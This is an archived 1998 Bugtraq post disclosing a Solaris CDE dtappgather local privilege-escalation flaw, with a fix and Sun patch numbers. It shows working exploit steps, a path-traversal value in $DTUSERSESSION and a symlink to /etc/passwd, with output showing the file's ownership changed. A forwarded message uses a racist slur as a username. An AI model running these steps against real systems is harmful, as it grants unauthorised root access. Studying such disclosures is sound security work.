[8378] in bugtraq
another /usr/dt/bin/dtappgather feature!
daemon@ATHENA.MIT.EDU (Andrea Costantino)
Tue Nov 3 18:58:21 1998
Date: Mon, 2 Nov 1998 18:05:59 +0100
Reply-To: Andrea Costantino <costan@AMB1.AMB.POLIMI.IT>
From: Andrea Costantino <costan@AMB1.AMB.POLIMI.IT>
X-To: news@rootshell.com
To: BUGTRAQ@NETSPACE.ORG
There's attached the message related to this new feature..
the /usr/dt/bin/dtappgather program tries to read the enviroment variable
$DTUSERSESSION to get the name of the file to seek for.
The file is searched in /var/dt/appconfig/appmanager.
Under SunOS 5.5,5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or
01777 so you're able to make a simbolic link to the file you wish, but on
SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this.
Unfortunately the dtappgather never check the $DTUSERSESSION variable, so
you can use the syntax ../../.. etc... to grab the file you wish, even if
you can't write the /var/dt/appconfig/appmanager directory....
For example
costan@penelope$ ls -ald /var/dt/appconfig/appmanager
drwxr-xr-x 9 bin bin 512 Oct 30 11:27 /var/dt/appconfig/appmanager
costan@penelope$ export $DTUSERSESSION=../../../../etc/passwd
costan@penelope$ /usr/dt/bin/dtappgather
[.... stuff ....]
costan@penelope$ ls -al /etc/passwd
-r-xr-xr-x 1 costan users 531 Oct 9 14:08 /etc/passwd
This way you're satisfied even without making strange link on strange path
(the name in CDE are very difficult to remember ;-) )
Best Wishes, admins...
Andrea Costantino (aka k0stan)
Network Manager at DIIAR
Politecnico di Milano
Attached message:
[ http://www.rootshell.com/ ]
Date: Mon, 23 Feb 1998 15:31:16 +0200
From: Mastoras <mastoras@PAPARI.HACK.GR>
Subject: /usr/dt/bin/dtappgather exploit
Buggy program:
/usr/dt/bin/dtappgather
Description of the problem:
Local users can change the ownership of any file, thus gaining
root priviledges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrects it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.
Systems Affected:
*At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if exists owned by another user.
Quick Fix:
chmod -s /usr/dt/bin/dtappgather
The Exploit:
The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".
Hack wisely,
Mastoras
/*
* Computer Engineering & Informatics Department, Patras, Greece
* Mastor Wins, Fatality! http://www.hack.gr/users/mastoras
*/
---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <mastoras@papari.hack.gr>
Reply-To: haxor@hack.gr
To: haxor@papari.hack.gr, Undisclosed recipients: ;
Subject: [HAXOR:11] dtappgather exploit
Hello,
I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:
nigg0r@host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root
it would be easy to find the exploit if you had read CERT's advisory.
the following steps were enough..
% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shity ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]
I hope this was not too lame or well-known :-)
Seeya,
mastoras
--------------------------------------------------------------------------
Steven Goldberg - SE - Seattle WA (steven.goldberg@West.Sun.COM)
Hi,
Sun has published the following patches to address this
vulnerability:
patches 104497 CDE 1.0.1: dtappgather patch
patches 104498 CDE 1.0.2: dtappgather patch
patches 104499 CDE 1.0.1_x86: dtappgather patch
patches 104500 CDE 1.0.2_x86: dtappgather patch
patches 105837 CDE 1.2: dtappgather Patch
patches 105838 CDE 1.2_x86: dtappgather Patch
thanks,
Steve
